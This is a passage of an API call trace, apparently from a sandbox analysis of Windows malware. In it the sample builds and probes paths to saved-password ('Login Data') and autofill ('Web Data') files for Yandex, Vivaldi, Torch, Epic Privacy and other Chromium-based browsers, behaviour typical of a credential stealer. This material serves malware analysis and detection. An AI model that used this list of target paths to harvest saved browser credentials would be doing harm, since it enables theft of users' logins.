Flags=0x0, Size=0x80) returned 0x63c438 [0063.029] GetProcessHeap () returned 0x620000 [0063.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.030] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.030] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Default\\Login Data") returned 0 [0063.031] GetProcessHeap () returned 0x620000 [0063.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c438 | out: hHeap=0x620000) returned 1 [0063.031] GetProcessHeap () returned 0x620000 [0063.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x6384c0 [0063.032] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.033] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Login Data") returned 78 [0063.033] GetProcessHeap () returned 0x620000 [0063.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x62ad28 [0063.033] GetProcessHeap () returned 0x620000 [0063.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.034] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Login Data") returned 0 [0063.035] GetProcessHeap () returned 0x620000 [0063.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62ad28 | out: hHeap=0x620000) returned 1 [0063.035] GetProcessHeap () returned 0x620000 [0063.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x6384c0 [0063.035] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.036] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Web Data") returned 76 [0063.036] GetProcessHeap () returned 0x620000 [0063.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9c) returned 0x62a938 [0063.036] GetProcessHeap () returned 0x620000 [0063.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.037] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.037] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Web Data") returned 0 [0063.038] GetProcessHeap () returned 0x620000 [0063.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62a938 | out: hHeap=0x620000) returned 1 [0063.038] GetProcessHeap () returned 0x620000 [0063.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x6384c0 [0063.039] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.039] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Login Data") returned 59 [0063.039] GetProcessHeap () returned 0x620000 [0063.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7a) returned 0x63c428 [0063.039] GetProcessHeap () returned 0x620000 [0063.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.040] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Login Data") returned 0 [0063.041] GetProcessHeap () returned 0x620000 [0063.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c428 | out: hHeap=0x620000) returned 1 [0063.041] GetProcessHeap () returned 0x620000 [0063.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x6384c0 [0063.042] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.042] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Default\\Login Data") returned 67 [0063.042] GetProcessHeap () returned 0x620000 [0063.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a) returned 0x63c438 [0063.042] GetProcessHeap () returned 0x620000 [0063.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.044] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.044] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Default\\Login Data") returned 0 [0063.044] GetProcessHeap () returned 0x620000 [0063.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c438 | out: hHeap=0x620000) returned 1 [0063.045] GetProcessHeap () returned 0x620000 [0063.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x6384c0 [0063.045] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.046] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Login Data") returned 70 [0063.046] GetProcessHeap () returned 0x620000 [0063.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x63c450 [0063.046] GetProcessHeap () returned 0x620000 [0063.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.048] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Login Data") returned 0 [0063.048] GetProcessHeap () returned 0x620000 [0063.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c450 | out: hHeap=0x620000) returned 1 [0063.048] GetProcessHeap () returned 0x620000 [0063.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x6384c0 [0063.049] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.050] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Web Data") returned 68 [0063.050] GetProcessHeap () returned 0x620000 [0063.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c) returned 0x63c448 [0063.050] GetProcessHeap () returned 0x620000 [0063.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.051] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.051] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Web Data") returned 0 [0063.051] GetProcessHeap () returned 0x620000 [0063.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c448 | out: hHeap=0x620000) returned 1 [0063.051] GetProcessHeap () returned 0x620000 [0063.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x6384c0 [0063.052] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.053] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Login Data") returned 51 [0063.053] GetProcessHeap () returned 0x620000 [0063.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x6a) returned 0x63c428 [0063.053] GetProcessHeap () returned 0x620000 [0063.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.054] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.054] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Login Data") returned 0 [0063.055] GetProcessHeap () returned 0x620000 [0063.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c428 | out: hHeap=0x620000) returned 1 [0063.055] GetProcessHeap () returned 0x620000 [0063.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x6384c0 [0063.056] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.056] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Default\\Login Data") returned 59 [0063.056] GetProcessHeap () returned 0x620000 [0063.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7a) returned 0x63c438 [0063.056] GetProcessHeap () returned 0x620000 [0063.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.057] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.057] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Default\\Login Data") returned 0 [0063.058] GetProcessHeap () returned 0x620000 [0063.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c438 | out: hHeap=0x620000) returned 1 [0063.058] GetProcessHeap () returned 0x620000 [0063.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x6384c0 [0063.059] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.076] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data") returned 85 [0063.076] GetProcessHeap () returned 0x620000 [0063.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63c450 [0063.076] GetProcessHeap () returned 0x620000 [0063.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.078] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data") returned 0 [0063.078] GetProcessHeap () returned 0x620000 [0063.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c450 | out: hHeap=0x620000) returned 1 [0063.078] GetProcessHeap () returned 0x620000 [0063.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x6384c0 [0063.079] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.079] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Web Data") returned 83 [0063.079] GetProcessHeap () returned 0x620000 [0063.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xaa) returned 0x63c448 [0063.080] GetProcessHeap () returned 0x620000 [0063.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.081] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.081] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Web Data") returned 0 [0063.081] GetProcessHeap () returned 0x620000 [0063.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c448 | out: hHeap=0x620000) returned 1 [0063.081] GetProcessHeap () returned 0x620000 [0063.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x6384c0 [0063.082] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.082] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Login Data") returned 66 [0063.082] GetProcessHeap () returned 0x620000 [0063.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x88) returned 0x63c428 [0063.082] GetProcessHeap () returned 0x620000 [0063.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.084] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.084] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Login Data") returned 0 [0063.084] GetProcessHeap () returned 0x620000 [0063.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c428 | out: hHeap=0x620000) returned 1 [0063.084] GetProcessHeap () returned 0x620000 [0063.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x6384c0 [0063.085] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.085] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Default\\Login Data") returned 74 [0063.085] GetProcessHeap () returned 0x620000 [0063.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x98) returned 0x63c438 [0063.085] GetProcessHeap () returned 0x620000 [0063.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.086] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.087] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Default\\Login Data") returned 0 [0063.087] GetProcessHeap () returned 0x620000 [0063.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c438 | out: hHeap=0x620000) returned 1 [0063.087] GetProcessHeap () returned 0x620000 [0063.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x6384c0 [0063.088] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.088] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Login Data") returned 85 [0063.088] GetProcessHeap () returned 0x620000 [0063.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63c450 [0063.088] GetProcessHeap () returned 0x620000 [0063.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.089] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.089] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Login Data") returned 0 [0063.090] GetProcessHeap () returned 0x620000 [0063.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c450 | out: hHeap=0x620000) returned 1 [0063.090] GetProcessHeap () returned 0x620000 [0063.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x6384c0 [0063.091] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.092] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Web Data") returned 83 [0063.092] GetProcessHeap () returned 0x620000 [0063.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xaa) returned 0x63c448 [0063.092] GetProcessHeap () returned 0x620000 [0063.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.093] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.093] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Web Data") returned 0 [0063.093] GetProcessHeap () returned 0x620000 [0063.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c448 | out: hHeap=0x620000) returned 1 [0063.093] GetProcessHeap () returned 0x620000 [0063.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x6384c0 [0063.094] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.094] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Login Data") returned 66 [0063.094] GetProcessHeap () returned 0x620000 [0063.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x88) returned 0x63c428 [0063.094] GetProcessHeap () returned 0x620000 [0063.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.095] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.095] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Login Data") returned 0 [0063.095] GetProcessHeap () returned 0x620000 [0063.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c428 | out: hHeap=0x620000) returned 1 [0063.096] GetProcessHeap () returned 0x620000 [0063.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x6384c0 [0063.096] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.097] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Default\\Login Data") returned 74 [0063.097] GetProcessHeap () returned 0x620000 [0063.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x98) returned 0x63c438 [0063.097] GetProcessHeap () returned 0x620000 [0063.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.098] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.098] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Default\\Login Data") returned 0 [0063.098] GetProcessHeap () returned 0x620000 [0063.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c438 | out: hHeap=0x620000) returned 1 [0063.099] GetProcessHeap () returned 0x620000 [0063.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x6384c0 [0063.099] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.100] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Login Data") returned 79 [0063.100] GetProcessHeap () returned 0x620000 [0063.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa2) returned 0x63c450 [0063.100] GetProcessHeap () returned 0x620000 [0063.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.101] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Login Data") returned 0 [0063.101] GetProcessHeap () returned 0x620000 [0063.101] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c450 | out: hHeap=0x620000) returned 1 [0063.101] GetProcessHeap () returned 0x620000 [0063.101] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x6384c0 [0063.102] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.102] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Web Data") returned 77 [0063.103] GetProcessHeap () returned 0x620000 [0063.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9e) returned 0x62ad28 [0063.103] GetProcessHeap () returned 0x620000 [0063.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.104] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Web Data") returned 0 [0063.104] GetProcessHeap () returned 0x620000 [0063.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62ad28 | out: hHeap=0x620000) returned 1 [0063.104] GetProcessHeap () returned 0x620000 [0063.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x6384c0 [0063.105] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.105] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Login Data") returned 60 [0063.105] GetProcessHeap () returned 0x620000 [0063.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7c) returned 0x63c428 [0063.105] GetProcessHeap () returned 0x620000 [0063.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.107] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.107] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Login Data") returned 0 [0063.107] GetProcessHeap () returned 0x620000 [0063.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c428 | out: hHeap=0x620000) returned 1 [0063.108] GetProcessHeap () returned 0x620000 [0063.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x6384c0 [0063.108] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.109] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Default\\Login Data") returned 68 [0063.109] GetProcessHeap () returned 0x620000 [0063.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c) returned 0x63c438 [0063.109] GetProcessHeap () returned 0x620000 [0063.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.110] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.111] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Default\\Login Data") returned 0 [0063.111] GetProcessHeap () returned 0x620000 [0063.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c438 | out: hHeap=0x620000) returned 1 [0063.112] GetProcessHeap () returned 0x620000 [0063.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x6384c0 [0063.113] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.114] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data") returned 72 [0063.114] GetProcessHeap () returned 0x620000 [0063.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x94) returned 0x63c450 [0063.114] GetProcessHeap () returned 0x620000 [0063.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.116] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.116] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data") returned 0 [0063.117] GetProcessHeap () returned 0x620000 [0063.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c450 | out: hHeap=0x620000) returned 1 [0063.117] GetProcessHeap () returned 0x620000 [0063.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x6384c0 [0063.118] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.119] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Web Data") returned 70 [0063.119] GetProcessHeap () returned 0x620000 [0063.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x63c448 [0063.119] GetProcessHeap () returned 0x620000 [0063.120] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.121] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.121] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Web Data") returned 0 [0063.132] GetProcessHeap () returned 0x620000 [0063.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c448 | out: hHeap=0x620000) returned 1 [0063.132] GetProcessHeap () returned 0x620000 [0063.132] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x6384c0 [0063.133] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.133] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Login Data") returned 53 [0063.133] GetProcessHeap () returned 0x620000 [0063.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x6e) returned 0x63c428 [0063.133] GetProcessHeap () returned 0x620000 [0063.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.134] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.134] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Login Data") returned 0 [0063.135] GetProcessHeap () returned 0x620000 [0063.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c428 | out: hHeap=0x620000) returned 1 [0063.135] GetProcessHeap () returned 0x620000 [0063.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x6384c0 [0063.136] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.136] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Default\\Login Data") returned 61 [0063.136] GetProcessHeap () returned 0x620000 [0063.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7e) returned 0x63c438 [0063.136] GetProcessHeap () returned 0x620000 [0063.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.138] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.138] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Default\\Login Data") returned 0 [0063.138] GetProcessHeap () returned 0x620000 [0063.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c438 | out: hHeap=0x620000) returned 1 [0063.139] GetProcessHeap () returned 0x620000 [0063.139] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x6384c0 [0063.139] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.140] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Login Data") returned 80 [0063.140] 